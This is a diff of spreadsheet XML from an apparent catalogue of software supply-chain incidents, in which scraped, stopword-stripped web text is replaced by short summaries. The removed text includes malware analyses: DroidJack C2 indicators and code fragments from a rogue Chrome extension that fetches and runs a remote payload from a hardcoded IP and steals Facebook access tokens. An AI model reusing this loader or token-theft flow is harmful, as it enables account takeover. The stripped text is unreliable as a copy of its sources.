'report', 'vulnerability', 'network', 'right']</t>
         </is>
       </c>
     </row>
@@ -1174,15 +1062,14 @@
           <t>npm, PyPi, RubyGems.org</t>
         </is>
       </c>
-      <c r="C29" t="inlineStr"/>
+      <c r="C29" t="inlineStr">
+        <is>
+          <t>As a research project, a student uploaded 214 packages to npm, PyPi, and RubyGems.org to evaluate the potential of typosquatting attacks.  There were 19721 unique installations over approximately 6 weeks.</t>
+        </is>
+      </c>
       <c r="D29" t="inlineStr">
         <is>
           <t>https://incolumitas.com/data/thesis.pdf</t>
-        </is>
-      </c>
-      <c r="E29" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -1199,17 +1086,12 @@
       </c>
       <c r="C30" t="inlineStr">
         <is>
-          <t>blog archive npmjscom status support blog discontinued updates team published github blog github changelog leftpad earlier week many users suffered disruption package many projects depend directly indirectly unpublished author part dispute package name event generated attention raised many concerns scale disruption circumstances dispute actions took response here’s explanation happened timeline recent weeks azer koçulu exchanged correspondence module name weren’t able come agreement last week representative contacted help resolving disagreement hasn’t first time members community disagreed name global namespace unscoped modules collisions inevitable package name dispute resolution policy reason policy encourages parties attempt amicable solution impossible articulates resolve dispute policy’s overarching goal provide users package expect covers spam typosquatting misleading package names also complicated cases entirely basis concluded package name “kik” ought maintained informed parties followed process routine though rare happened next though unprecedented dispute policy existing package disputed name typically remains registry owner name publishes package breaking version number anyone using azer’s existing package would continued find case though without warning developers dependent projects azer unpublished package packages leftpad impacted many thousands projects shortly pacific time tuesday march began observing hundreds failures minute dependent projects dependents dependents… failed requesting nowunpublished package within minutes cameron westland stepped published functionally identical version leftpad possible leftpad open source allow anyone abandoned package name long don’t version numbers cameron’s leftpad published version continued observe many errors happened number dependency chains including babel atom bringing linenumbers explicitly requested conferred cameron took unprecedented step republishing original required relying backup since republishing isn’t otherwise possible announced plan completed operation duration disruption hours worked stand package name dispute resolution policy decision given packages vying name believe substantial number users type install would confused receive code unrelated messaging million users dispute resolution policy minimizes disruption transferring ownership package’s name doesn’t remove current versions package dependents still retrieve install nothing breaks azer taken action would published version everyone depending upon azer’s package could continued find abrupt unpublishing resolution policy yesterday’s disruptions community stepped it’s pretty remarkable cameron stepped replace leftpad within minutes affected modules adopted others community similar time either republished forks original modules created “dummy” packages prevent malicious publishing modules names we’re grateful everyone stepped explicit permission working transfer npm’s direct control didn’t work unrestricted unpublishing caused pain historical reasons it’s possible unpublish package registry however we’ve inflection point size community critical become node frontend development communities abruptly removing package disrupted many thousands developers threatened everyone’s trust foundation open source software developers rely build upon another’s work needs safeguards keep anyone causing much disruption place yesterday postmortem wouldn’t necessary poor communication made matters worse immediate wake yesterday’s disruption continuing even blogs twitter impassioned debate based falsehoods “steal” azer’s code leftpad opensource code explicitly allows republishing author that’s happened case incident arise intellectual property we’re aware azer discussed legal issues surrounding “kik” trademark wasn’t pertinent decision relied dispute resolution policy solely editorial choice made best interests vast majority npm’s users won’t suddenly take package name guiding principle prevent confusion among users rare event another member community requests help resolving conflict work resolution communicating sides overwhelming majority cases resolutions amicable took long update purely technical operations outage internal processes would much challenge happens next technical social aspects problem reasonable course action must address make harder unpublish version package would break packages still fleshing technical details work like registry change course take time consider implement care make harder maliciously adopt abandoned package name package known dependents completely unpublished we’ll replace package placeholder package prevents immediate adoption name still possible name abandoned package contacting support updating internal policies help team stay sync address community conflict effectively recap tldr dropped ball protecting disruption caused unrestricted unpublishing we’re addressing technical policy changes npm’s wellestablished documented dispute resolution policy followed letter legal dispute we’ll continue everything reduce friction lives javascript developers community millions developers conflict inevitable can’t head every disagreement earn trust policies actions biased supporting many developers possible march 23rd 621pm</t>
+          <t>Azer Koulu unpublished 273 npm packages he maintained after losing a dispute over control of the package name kik.</t>
         </is>
       </c>
       <c r="D30" t="inlineStr">
         <is>
           <t>https://blog.npmjs.org/post/141577284765/kik-left-pad-and-npm</t>
-        </is>
-      </c>
-      <c r="E30" t="inlineStr">
-        <is>
-          <t>['blog', 'archive', 'status', 'support', 'blog', 'update', 'team', 'week', 'many', 'user', 'disruption', 'package', 'many', 'project', 'author', 'part', 'dispute', 'package', 'name', 'event', 'attention', 'many', 'concern', 'scale', 'disruption', 'circumstance', 'dispute', 'action', 'response', 'explanation', 'timeline', 'recent', 'week', 'correspondence', 'module', 'name', 'able', 'agreement', 'last', 'week', 'representative', 'help', 'disagreement', 'first', 'time', 'member', 'community', 'name', 'global', 'namespace', 'module', 'collision', 'inevitable', 'package', 'name', 'dispute', 'resolution', 'policy', 'reason', 'policy', 'party', 'amicable', 'solution', 'impossible', 'articulate', 'dispute', 'policy', 'goal', 'user', 'package', 'spam', 'misleading', 'package', 'name', 'complicated', 'case', 'package', 'name', 'informed', 'party', 'process', 'routine', 'rare', 'unprecedented', 'dispute', 'policy', 'package', 'name', 'registry', 'owner', 'name', 'package', 'version', 'number', 'azer', 'package', 'case', 'developer', 'dependent', 'project', 'azer', 'package', 'package', 'many', 'thousand', 'project', 'pacific', 'time', 'hundred', 'failure', 'dependent', 'project', 'dependent', 'dependent', 'nowunpublished', 'package', 'minute', 'identical', 'version', 'possible', 'open', 'source', 'package', 'name', 'number', 'version', 'many', 'error', 'number', 'dependency', 'chain', 'babel', 'atom', 'bringing', 'linenumber', 'unprecedented', 'step', 'original', 'backup', 'republishing', 'possible', 'plan', 'operation', 'duration', 'disruption', 'hour', 'stand', 'package', 'name', 'dispute', 'resolution', 'policy', 'decision', 'package', 'name', 'substantial', 'number', 'user', 'type', 'install', 'code', 'unrelated', 'user', 'dispute', 'resolution', 'policy', 'disruption', 'ownership', 'package', 'name', 'current', 'version', 'package', 'dependent', 'install', 'break', 'action', 'version', 'package', 'abrupt', 'resolution', 'policy', 'yesterday', 'disruption', 'community', 'remarkable', 'minute', 'module', 'other', 'community', 'similar', 'time', 'fork', 'original', 'module', 'dummy', 'package', 'malicious', 'publishing', 'module', 'name', 'grateful', 'explicit', 'permission', 'working', 'transfer', 'direct', 'control', 'unrestricted', 'unpublishing', 'pain', 'historical', 'reason', 'possible', 'unpublish', 'package', 'registry', 'inflection', 'point', 'size', 'community', 'critical', 'node', 'development', 'community', 'package', 'many', 'thousand', 'developer', 'foundation', 'open', 'source', 'software', 'developer', 'work', 'safeguard', 'much', 'disruption', 'place', 'yesterday', 'postmortem', 'necessary', 'poor', 'communication', 'matter', 'bad', 'immediate', 'wake', 'yesterday', 'disruption', 'blog', 'twitt', 'impassioned', 'debate', 'falsehood', 'azer', 'author', 'case', 'incident', 'intellectual', 'property', 'aware', 'azer', 'legal', 'issue', 'kik', 'trademark', 'pertinent', 'decision', 'dispute', 'resolution', 'policy', 'editorial', 'choice', 'good', 'interest', 'vast', 'majority', 'user', 'package', 'name', 'principle', 'prevent', 'confusion', 'user', 'rare', 'event', 'member', 'community', 'request', 'conflict', 'work', 'resolution', 'side', 'majority', 'case', 'resolution', 'amicable', 'long', 'update', 'technical', 'operation', 'outage', 'internal', 'process', 'much', 'challenge', 'technical', 'social', 'aspect', 'problem', 'reasonable', 'course', 'action', 'hard', 'unpublish', 'version', 'package', 'package', 'technical', 'detail', 'work', 'registry', 'change', 'course', 'time', 'implement', 'care', 'package', 'name', 'package', 'dependent', 'package', 'placeholder', 'package', 'immediate', 'adoption', 'name', 'possible', 'name', 'package', 'support', 'internal', 'policy', 'team', 'sync', 'address', 'community', 'conflict', 'recap', 'ball', 'disruption', 'unrestricted', 'unpublishing', 'technical', 'policy', 'change', 'wellestablished', 'dispute', 'resolution', 'policy', 'letter', 'legal', 'dispute', 'friction', 'javascript', 'developer', 'community', 'million', 'developer', 'inevitable', 'disagreement', 'trust', 'policy', 'action', 'many', 'developer', 'possible', '23rd']</t>
         </is>
       </c>
     </row>
@@ -1226,7 +1108,7 @@
       </c>
       <c r="C31" t="inlineStr">
         <is>
-          <t>origin unreachable error code visit cloudflarecom information browser working toronto cloudflare working wwweventidnet host error happened origin server reachable youre visitor website please minutes youre owner website check settings error means cloudflare could reach host server common cause settings incorrect please contact hosting provider confirm origin make sure correct listed record cloudflare settings page additional troubleshooting information cloudflare 86b432139f5b3702 click reveal 2607fea82cc0ab00acd95757bf23f8f3 performance cloudflare</t>
+          <t>Attackers breached the download server of an application (used by system administrators to analyze Windows logs) and replaced the legitimate application and updates with a signed malicious version.</t>
         </is>
       </c>
       <c r="D31" t="inlineStr">
@@ -1235,11 +1117,6 @@
 https://www.rsa.com/en-us/blog/2017-02/kingslayer-a-supply-chain-attack</t>
         </is>
       </c>
-      <c r="E31" t="inlineStr">
-        <is>
-          <t>['origin', 'unreachable', 'error', 'code', 'visit', 'host', 'error', 'origin', 'server', 'reachable', 'visitor', 'website', 'minute', 'owner', 'website', 'check', 'setting', 'error', 'cloudflare', 'host', 'server', 'common', 'cause', 'setting', 'incorrect', 'provider', 'confirm', 'origin', 'sure', 'correct', 'record', 'cloudflare', 'setting', 'additional', 'troubleshooting', 'information', 'cloudflare', 'performance', 'cloudflare']</t>
-        </is>
-      </c>
     </row>
     <row r="32">
       <c r="A32" t="inlineStr">
@@ -1254,17 +1131,12 @@
       </c>
       <c r="C32" t="inlineStr">
         <is>
-          <t>skip main content products solutions partners resources company english americas english europe middle east africa english asiapacific español deutsch français italiano português login support login digital risk portal email fraud defense intelligence proofpoint essentials sendmail support login contact protection stop inbound email threats drive awareness impersonation protection authenticate email identify risky suppliers identity protection protect identities hybrid enterprises account takeover information protection defend data manage insider premium services leverage proactive expertise operational continuity deeper insights skilled experts protect people defend data proofpoint cybersecurity packages humancentric cybersecurity packages proofpoint complete protection todays risks—tailored organizations unique needs maximize optimize value learn solutions topic combat email cloud threats protect people email cloud threats intelligent holistic approach change user behavior help employees identify resist report attacks damage done combat data loss insider risk prevent data loss negligent compromised malicious insiders correlating content behavior threats modernize compliance archiving manage risk data retention needs modern compliance archiving solution protect cloud apps keep people cloud apps secure eliminating threats avoiding data loss mitigating compliance risk prevent loss ransomware learn growing stop attacks securing today’s ransomware vector email secure microsoft implement best compliance solution microsoft collaboration suite defend remote workforce cloud edge secure access corporate resources ensure business continuity remote workers authenticate email protect email deliverability dmarc proofpoint today’s cyber attacks target people learn unique peoplecentric approach protection solutions industry federal government state local government higher education financial services healthcare mobile operators internet service providers small medium businesses partner programs channel partners become channel partner deliver proofpoint solutions customers grow business archive extraction partners learn proofpoint extraction partners global system integrator managed service provider partners learn global consulting services partners deliver fully managed integrated solutions technology alliance partners learn relationships industryleading firms help protect people data brand social media protection partners learn technology alliance partners social media protection partner program proofpoint essentials partner programs small business solutions channel partners msps partner tools become channel partner channel partner portal resource library find information youre looking library videos data sheets white papers blog keep latest news happenings ever‑evolving cybersecurity landscape podcasts learn human side cybersecurity episodes feature insights experts executives perimeters magazine latest cybersecurity insights hands featuring valuable knowledge industry experts glossary learn latest threats protect people data brand events connect events learn protect people data ever‑evolving threats customer stories read proofpoint customers around globe solve pressing cybersecurity challenges webinars browse webinar library learn latest threats trends issues cybersecurity hubs free research resources help protect threats build culture stop ransomware tracks ciso cybersecurity awareness ransomware insider management proofpoint proofpoint leading cybersecurity company protects organizations greatest assets biggest risks people proofpoint today’s cyber attacks target people learn unique peoplecentric approach protection careers stand make difference worlds leading cybersecurity companies news center read latest press releases news stories media highlights proofpoint privacy trust learn handle data make commitments privacy regulations environmental social governance learn peoplecentric principles implement positively impact global community support access full range proofpoint support services learn blog insight droidjack uses sideload…its super effective backdoored pokemon android found droidjack uses sideload…its super effective backdoored pokemon android found share network july proofpoint staff overview pokemon first pokemon game sanctioned nintendo android devices augmented reality game first released australia zealand july users regions quickly clamored versions devices released july rest world remain tempted find copy outside legitimate channels number publications provided tutorials sideloading application android however apps installed outside official stores users bargained case proofpoint researchers discovered infected android version newly released mobile game pokemon specific modified include malicious remote access tool called droidjack also known sandrorat would virtually give attacker full control victim’s phone droidjack described past including symantec kaspersky although observed malicious wild uploaded malicious file repository service july less hours game officially released zealand australia likely fact game officially released globally time many gamers wishing access game released region resorted downloading third parties additionally many large media outlets provided instructions download game third party even went described install downloaded third party install directly youll first tell android device accept sideloaded apps usually done visiting settings clicking area enabling unknown sources checkbox unfortunately extremely risky practice easily lead users installing malicious apps mobile devices individual download third party infected backdoor discovered device would compromised individuals worried whether downloaded malicious options help determine infected first check sha256 hash downloaded legitimate application often linked media outlets hash 8bf2b0865bef06906cd854492dece202482c04ce9c5e881e02d2b6235661ab67 although possible updated versions already released malicious analyzed sha256 hash 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4 another simple method check device infected would check installed application’s permissions typically accessed first going settings apps pokemon scrolling permissions section figure shows list permissions granted legitimate application permissions subject change depending device’s configuration example permissions “google play billing service” “receive data internet” shown image granted another device downloading pokemon google play store figures outlined permissions added droidjack seeing permissions granted pokemon could indicate device infected although permissions also subject change future figure granted permissions legitimate pokemon figure granted permissions backdoored pokemon first screenshot figure granted permissions backdoored pokemon second screenshot infected pokemon modified launched victim would likely notice installed malicious application figure shows startup screen infected pokemon game identical legitimate figure infected pokemon start screen appears identical legitimate application inspecting infected game compared legitimate game three classes stand added attacker figure shows classes legitimate game figure shows classes infected game including following added classes netdroidjackserver furthermore droidjack configured communicate command control domain pokemonnoiporg port noiporg service used associate domain name dynamic address like generally assigned home small business users opposed dedicated address also used frequently actors along similar services like dyndns time analysis domain resolved address turkey accepting connections infected devices figure legitimate pokemon classes figure infected pokemon classes highlighted malicious classes figure hardcoded domain port conclusion installing apps thirdparty sources officially vetted sanctioned corporate stores never advisable official enterprise stores procedures algorithms vetting mobile applications sideloading apps often questionable sources exposes users mobile devices variety malware case compromised pokemon analyzed potential exists attackers completely compromise mobile device device brought onto corporate network networked resources also risk even though observed wild represents important proof concept namely cybercriminals take advantage popularity applications like pokemon trick users installing malware devices bottom line latest software device mean instead downloading available applications legitimate stores best avoid compromising device networks accesses references httppokemongonianticlabscomen httpwwwsymanteccomconnectblogsdroidjackrattalehowbuddingentrepreneurismcanturncybercrime httpwwwwelivesecuritycom20151030usingdroidjackspyandroidexpectvisitpolice httpswwwtheguardiancomtechnology2016jul07howtogetpokemongouk httpwwwwiredcoukarticlepokemongooutnowdownloadiosandroid httpwwwandroidpolicecom20160707pokemongonowliveseveralcountriesincludingaustralianewzealandpossibly httparstechnicacomgaming201607pokemongoiosandroiddownload indicators compromise type description 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4 sha256 backdoored pokemon d350cc8222792097317608ea95b283a8 backdoored pokemon pokemonnoiporg domain droidjack droidjack select signatures would fire traffic etpro mobilemalware pokemon androidosdroidjack lookup etpro mobilemalware androidosdroidjack beacon previous blog post next blog post subscribe proofpoint blog overview proofpoint careers leadership team news center nexus platform privacy trust center cybersecurity awareness ransomware glossary blog products email protection advanced protection awareness training cloud archive compliance information protection product bundles resources white papers webinars data sheets events customer stories blog free trial connect contact office locations request demo support support login support services address blocked facebook twitter linkedin youtube english english english español deutsch français italiano português rights reserved terms conditions privacy policy sitemap</t>
+          <t>Proofpoint found an infected Android version of the mobile game Pokemon Go on third party app servers. This particular APK has been modified, including a malicious remote access tool called DroidJack (also known as SandroRAT).</t>
         </is>
       </c>
       <c r="D32" t="inlineStr">
         <is>
           <t>https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app</t>
-        </is>
-      </c>
-      <c r="E32" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'product', 'solution', 'partner', 'resource', 'company', 'italiano', 'português', 'login', 'support', 'digital', 'risk', 'portal', 'email', 'defense', 'intelligence', 'proofpoint', 'essential', 'sendmail', 'support', 'login', 'contact', 'protection', 'inbound', 'email', 'threat', 'awareness', 'impersonation', 'protection', 'authenticate', 'email', 'risky', 'supplier', 'identity', 'protection', 'identity', 'hybrid', 'enterprise', 'takeover', 'information', 'protection', 'datum', 'insider', 'premium', 'service', 'proactive', 'expertise', 'operational', 'continuity', 'deep', 'insight', 'skilled', 'expert', 'people', 'datum', 'cybersecurity', 'package', 'cybersecurity', 'package', 'complete', 'protection', 'today', 'risk', 'organization', 'unique', 'need', 'optimize', 'value', 'solution', 'topic', 'combat', 'email', 'cloud', 'threat', 'people', 'email', 'cloud', 'threat', 'intelligent', 'holistic', 'approach', 'user', 'behavior', 'employee', 'resist', 'report', 'attack', 'damage', 'combat', 'datum', 'loss', 'insider', 'risk', 'datum', 'loss', 'negligent', 'malicious', 'insider', 'correlating', 'content', 'behavior', 'threat', 'compliance', 'archiving', 'risk', 'datum', 'retention', 'modern', 'compliance', 'archiving', 'solution', 'cloud', 'app', 'people', 'cloud', 'app', 'secure', 'threat', 'datum', 'loss', 'compliance', 'risk', 'prevent', 'loss', 'ransomware', 'stop', 'attack', 'today', 'ransomware', 'vector', 'email', 'good', 'compliance', 'solution', 'suite', 'remote', 'edge', 'secure', 'access', 'corporate', 'resource', 'business', 'continuity', 'remote', 'worker', 'email', 'email', 'deliverability', 'today', 'cyber', 'attack', 'people', 'unique', 'peoplecentric', 'approach', 'protection', 'solution', 'industry', 'federal', 'government', 'state', 'local', 'government', 'high', 'education', 'financial', 'service', 'mobile', 'operator', 'internet', 'service', 'provider', 'small', 'medium', 'business', 'partner', 'program', 'channel', 'partner', 'channel', 'partner', 'solution', 'customer', 'business', 'archive', 'extraction', 'partner', 'proofpoint', 'extraction', 'partner', 'global', 'system', 'integrator', 'service', 'provider', 'partner', 'global', 'consulting', 'service', 'partner', 'solution', 'technology', 'alliance', 'partner', 'relationship', 'firm', 'people', 'datum', 'brand', 'social', 'media', 'protection', 'partner', 'technology', 'alliance', 'partner', 'social', 'protection', 'partner', 'program', 'partner', 'program', 'small', 'business', 'solution', 'channel', 'partner', 'partner', 'tool', 'channel', 'partner', 'channel', 'partner', 'portal', 'resource', 'library', 'information', 'library', 'video', 'datum', 'sheet', 'white', 'paper', 'blog', 'late', 'news', 'happening', 'cybersecurity', 'landscape', 'podcast', 'human', 'side', 'cybersecurity', 'episode', 'insight', 'expert', 'executive', 'perimeter', 'late', 'cybersecurity', 'insight', 'hand', 'valuable', 'knowledge', 'industry', 'expert', 'glossary', 'late', 'threat', 'people', 'datum', 'brand', 'event', 'event', 'people', 'datum', 'threat', 'customer', 'story', 'proofpoint', 'customer', 'globe', 'cybersecurity', 'challenge', 'webinar', 'webinar', 'library', 'late', 'threat', 'trend', 'issue', 'cybersecurity', 'hubs', 'free', 'research', 'resource', 'threat', 'culture', 'ransomware', 'track', 'ciso', 'cybersecurity', 'awareness', 'ransomware', 'insider', 'management', 'cybersecurity', 'company', 'organization', 'great', 'asset', 'big', 'risk', 'people', 'today', 'cyber', 'attack', 'people', 'unique', 'peoplecentric', 'approach', 'protection', 'career', 'difference', 'world', 'cybersecurity', 'company', 'news', 'center', 'late', 'press', 'release', 'news', 'story', 'media', 'highlight', 'privacy', 'trust', 'handle', 'datum', 'commitment', 'privacy', 'regulation', 'environmental', 'social', 'governance', 'peoplecentric', 'principle', 'global', 'community', 'support', 'access', 'full', 'range', 'support', 'service', 'blog', 'insight', 'droidjack', 'sideload', 'effective', 'droidjack', 'sideload', 'effective', 'share', 'network', 'overview', 'first', 'game', 'reality', 'game', 'region', 'version', 'device', 'copy', 'legitimate', 'channel', 'number', 'publication', 'tutorial', 'application', 'app', 'official', 'store', 'user', 'case', 'proofpoint', 'researcher', 'version', 'mobile', 'game', 'specific', 'malicious', 'remote', 'access', 'tool', 'droidjack', 'attacker', 'full', 'control', 'victim', 'phone', 'droidjack', 'symantec', 'kaspersky', 'malicious', 'wild', 'malicious', 'file', 'repository', 'service', 'less', 'hour', 'game', 'likely', 'fact', 'game', 'time', 'many', 'gamer', 'access', 'game', 'region', 'third', 'party', 'many', 'large', 'medium', 'outlet', 'instruction', 'game', 'install', 'third', 'party', 'device', 'app', 'setting', 'area', 'unknown', 'source', 'checkbox', 'risky', 'practice', 'user', 'malicious', 'app', 'mobile', 'device', 'individual', 'party', 'backdoor', 'device', 'individual', 'malicious', 'option', 'help', 'first', 'check', 'legitimate', 'application', 'medium', 'outlet', 'possible', 'version', 'malicious', 'hash', 'simple', 'method', 'check', 'device', 'installed', 'application', 'permission', 'setting', 'pokemon', 'permission', 'section', 'figure', 'list', 'permission', 'legitimate', 'application', 'permission', 'subject', 'change', 'device', 'configuration', 'example', 'permission', 'play', 'billing', 'service', 'data', 'internet', 'image', 'device', 'play', 'store', 'figure', 'permission', 'droidjack', 'permission', 'pokemon', 'device', 'permission', 'subject', 'change', 'future', 'figure', 'permission', 'legitimate', 'pokemon', 'figure', 'permission', 'pokemon', 'first', 'screenshot', 'figure', 'permission', 'pokemon', 'second', 'screenshot', 'victim', 'malicious', 'application', 'figure', 'startup', 'screen', 'game', 'identical', 'legitimate', 'figure', 'pokemon', 'start', 'screen', 'identical', 'legitimate', 'application', 'infected', 'game', 'legitimate', 'game', 'class', 'attacker', 'figure', 'class', 'legitimate', 'game', 'figure', 'class', 'game', 'class', 'droidjack', 'command', 'noiporg', 'service', 'associate', 'domain', 'name', 'dynamic', 'address', 'home', 'small', 'business', 'user', 'dedicated', 'address', 'actor', 'similar', 'service', 'dyndns', 'time', 'analysis', 'domain', 'address', 'turkey', 'connection', 'device', 'legitimate', 'pokemon', 'class', 'figure', 'pokemon', 'class', 'malicious', 'class', 'figure', 'domain', 'port', 'conclusion', 'app', 'thirdparty', 'source', 'corporate', 'store', 'advisable', 'official', 'enterprise', 'store', 'procedure', 'algorithm', 'mobile', 'application', 'app', 'questionable', 'source', 'user', 'mobile', 'device', 'malware', 'case', 'potential', 'attacker', 'mobile', 'device', 'device', 'corporate', 'network', 'resource', 'wild', 'important', 'proof', 'concept', 'cybercriminal', 'advantage', 'popularity', 'application', 'pokemon', 'trick', 'user', 'malware', 'device', 'bottom', 'line', 'late', 'software', 'device', 'available', 'application', 'legitimate', 'store', 'device', 'network', 'reference', 'httppokemongonianticlabscoman', 'httpwwwsymanteccomconnectblogsdroidjackrattalehowbuddingentrepreneurismcanturncybercrime', 'indicator', 'compromise', 'type', 'description', 'd350cc8222792097317608ea95b283a8', 'domain', 'droidjack', 'droidjack', 'select', 'signature', 'traffic', 'etpro', 'mobilemalware', 'previous', 'blog', 'post', 'next', 'blog', 'post', 'proofpoint', 'blog', 'overview', 'proofpoint', 'career', 'leadership', 'team', 'news', 'center', 'nexus', 'platform', 'privacy', 'trust', 'center', 'cybersecurity', 'awareness', 'ransomware', 'glossary', 'blog', 'product', 'email', 'protection', 'protection', 'awareness', 'training', 'compliance', 'information', 'protection', 'product', 'bundle', 'white', 'paper', 'data', 'sheet', 'event', 'customer', 'story', 'blog', 'free', 'trial', 'connect', 'contact', 'office', 'location', 'demo', 'support', 'support', 'login', 'support', 'service', 'address', 'facebook', 'twitter', 'português', 'right', 'term', 'condition', 'privacy', 'policy', 'sitemap']</t>
         </is>
       </c>
     </row>
@@ -1281,17 +1153,12 @@
       </c>
       <c r="C33" t="inlineStr">
         <is>
-          <t>notes output blog maxime kjaer malware browser might hacked chrome extension july increasingly browsers taking central role daily lives apps everything placed intimate data online services facebook amazon gmail move online services required online services diligence brought httpsonly sites twofactor authentication there’s still weak link chain rogue browser extension impair measures seems like people unaware attack vector browser extensions become they’re still quite unregulated territory although inherent limits exists little protection extension malware antivirus can’t help post i’ll share found investigating malware extension friend mine infected i’ve hesitated publishing code finally decided would never want help propagate malware however still want show malware functions i’ll posting extracts code post i’ve taken liberty remove lines irrelevant point making everything else really found discovery facebook news feed noticed friends regularly liking weird lewd clickbaity links clickbait content uncommon facebook something case noticed pattern always friend would like type links would always around likes comments page behind likes even weirder every single post page posted times posts friend liked likes comments know friend he’s smart don’t really liking tons frankly crap content intrigued decided rabbit hole clicked links huge mistake instantly greeted message saying verify could view content semiraunchy nature content made seem sort justified wasn’t justified though fact verification done installing chrome extension chrome extension would install order verify extension allegedly offered website called viralandscom linking quick search extensions revealed visibly identical extensions they’ve removed back looked extensions total users list almost identical extensions offered viralands chrome webstore feeling something completely decided take look extension’s code anything else here’s found facade utility extension manifest suspicious best good place start extension’s manifest file called manifestjson metadata file containing information extension name description version number permissions generally looking requested permissions listed scripts gives idea extension extensions asks following permissions permissions storage allurls tabs webnavigation alarms installing extension chrome translates permissions following warning “viral content verify” read change data websites visit already seems like awful extension needs check doesn’t keep reading manifest file find following lines background scripts scriptsquerystringjs scriptsinstalljs backgroundjs persistent true contentsecuritypolicy scriptsrc blob filesystem chromeextensionresource self unsafeeval objectsrc self wants scripts persistently meaning can’t paused able fetch data anywhere store evaluate stored code unsafely isn’t boding well already let’s take look three scripts backgroundjs querystringjs installjs validity suspicions verification fake backgroundjs script quite short thing extension installed opens popup popup simple html form enter birthday press “verify” cool extension might actually advertised javascript runs verification page particularly interesting tells another story document queryselector submit addeventlistener click function document queryselector hidden true document queryselector loading hidden false settimeout function document queryselector loading hidden true document queryselector done hidden false randomintfrominterval you’re reading right click “verify” display “loading…” idle random amount time “done” doesn’t anything verification dummy hiding extension runs scripts namely querystringjs installjs let’s what’s going actually fetching remote payload querystringjs script isn’t much interest it’s copy package you’ll never believe installjs line surprise hurt little inside write sentence like among first lines installjs eyestriking line programurl http104131351369999jsnewphpid22 it’s hardcoded variable external server fetch scripts also doesn’t even courtesy https bonus mitm attacks spoiler alert script fetches server malware payload extension needs download installed cannot ship payload wants pass chrome webstore’s checks fetches script server stores localstorage executes happening getprogram function function getprogram event xmlhttprequest programurl querysign indexof querysign date open true setrequestheader xyzextensionid chrome runtime onload function code response window function code console executing loaded code exit error localstorage setitem localcode code catch console error send able simulate request following curl command curl externaljs header xyzextensionid nogheblblcgkncmpggmikmcpnjdihgdd http104131351369999jsnewphpid gave malware payload doesn’t formal name called externaljs fairly long file clocking lines here’s it’s capable getting instructions external server urls defined beginning externaljs actionsurl http15920399206apiget statusurl http15920399206apistatus first instructions server second report back model getting instructions server sending status back trick it’s called command control short we’ll discover extension gets instructions server instructions contain looking getactions function defined externaljs function getactions xmlhttprequest open actionsurl true responsetype json onload function data response actions data data actions array isarray actions actions length checkfblogin function status fbloginstatus status handleactions actions send variable unique identifier machine generated function called generateuid function generateuid array uint32array window crypto getrandomvalues array return call array function return tostring join gave c38ae4ec1d2820bc9e2c03c0fe517585644576c988a03ae84af63b6d2bc9e7 i’ll example you’ll need create want instructions simulate request server curl actionsjson http15920399206apigetc38ae4ec1d2820bc9e2c03c0fe517585644576c988a03ae84af63b6d2bc9e7 returns json file containing list actions extension undertake instruction actions actiontype data httpswwwfacebookcomdialogoauthredirecturihttp3a2f2fwwwfacebookcom2fconnect2floginsuccesshtmlscopeemail2cpublishactions2cuseraboutme2cuseractionsbooks2cuseractionsmusic2cuseractionsnews2cuseractionsvideo2cuseractivities2cuserbirthday2cusereducationhistory2cuserevents2cusergamesactivity2cusergroups2cuserhometown2cuserinterests2cuserlikes2cuserlocation2cusernotes2cuserphotos2cuserquestions2cuserrelationshipdetails2cuserrelationships2cuserreligionpolitics2cuserstatus2cusersubscriptions2cuservideos2cuserwebsite2cuserworkhistory2cfriendsaboutme2cfriendsactionsbooks2cfriendsactionsmusic2cfriendsactionsnews2cfriendsactionsvideo2cfriendsactivities2cfriendsbirthday2cfriendseducationhistory2cfriendsevents2cfriendsgamesactivity2cfriendsgroups2cfriendshometown2cfriendsinterests2cfriendslikes2cfriendslocation2cfriendsnotes2cfriendsphotos2cfriendsquestions2cfriendsrelationshipdetails2cfriendsrelationships2cfriendsreligionpolitics2cfriendsstatus2cfriendssubscriptions2cfriendsvideos2cfriendswebsite2cfriendsworkhistory2cadsmanagement2ccreateevent2ccreatenote2cexportstream2cfriendsonlinepresence2cmanagefriendlists2cmanagenotifications2cmanagepages2cphotoupload2cpublishstream2creadfriendlists2creadinsights2creadmailbox2creadpagemailboxes2creadrequests2creadstream2crsvpevent2cshareitem2csms2cstatusupdate2cuseronlinepresence2cvideoupload2cxmpploginresponsetypetokenclientid41158896424rdr callback http15920399206apigettoken actiontype data httpswwwfacebookcomdialogoauthredirecturihttp3a2f2fwwwfacebookcom2fconnect2floginsuccesshtmlscopeemail2cpublishactionsresponsetypetokenclientid241284008322rdr callback http15920399206apigettoken2 actiontype data vvideosss let’s make sense means extension leaking access tokens first actions contain links extension steal access tokens load links forwarded containing access tokens extension catch send server callback field facebook access token malware operators access account send read messages post statuses links comment like posts pages… stolen equivalent login credentials stolen liking facebook pages instructions downloaded also told extension like page called vvideosss let’s check page likes popular page wait thats users infected viralands extensions seems likely page question must’ve bought likes dodgy provider side note adjective applies facebook like sellers creates likes infected computers instead clickfarms something though pure speculation certain something fishy going page subscribing youtube channels didn’t instructions subscribe youtube channels code contain function reporting back server extension also report back server current status following function function sendstatus data chrome storage local function storage data storage data extensionid chrome runtime data fbloginstatus fbloginstatus xmlhttprequest open post statusurl true setrequestheader contenttype applicationxwwwformurlencoded send querystring stringify data console status data sent data sends three things back server unique string identifies infected machine extension string corresponding extension reporting back multiple copies extension available chrome webstore malware operators might need know whether infected machine currently signed facebook taking malware operators information judge exact size activity botnet factors determine value black market potentially much extension always lookout version payload though haven’t witnessed change could well evolve gain capabilities since malware permission “read change data websites visit” operators could gain total control everything happens browser could potentially read emails steal login credentials ddos someone mine bitcoin seed pirated content… name even includes reading leaking credit card information ever type local files offlimit though that’s consolation hurray right taking botnet though viralands extensions taken chrome webstore doesn’t change anything infected computers best knowledge couldn’t find anything confirming though extension stays installed even removed webstore every infected machine effectively stays infected thankfully network isn’t really well conceived wikipedia article notes botnet server structure lacks redundancy vulnerable least temporary disconnection server redundancy case server hardcoded address malware operators lose control said address whole network would effectively deactivated article notes cases computer experts succeeded destroying subverting malware command control networks among means seizing servers getting internet well wouldn’t consider expert computer might able destroy network anyway using ipalyzer found addresses belong digitalocean hosting provider actually site experience signaling abuse digitalocean always responsive usually getting issue 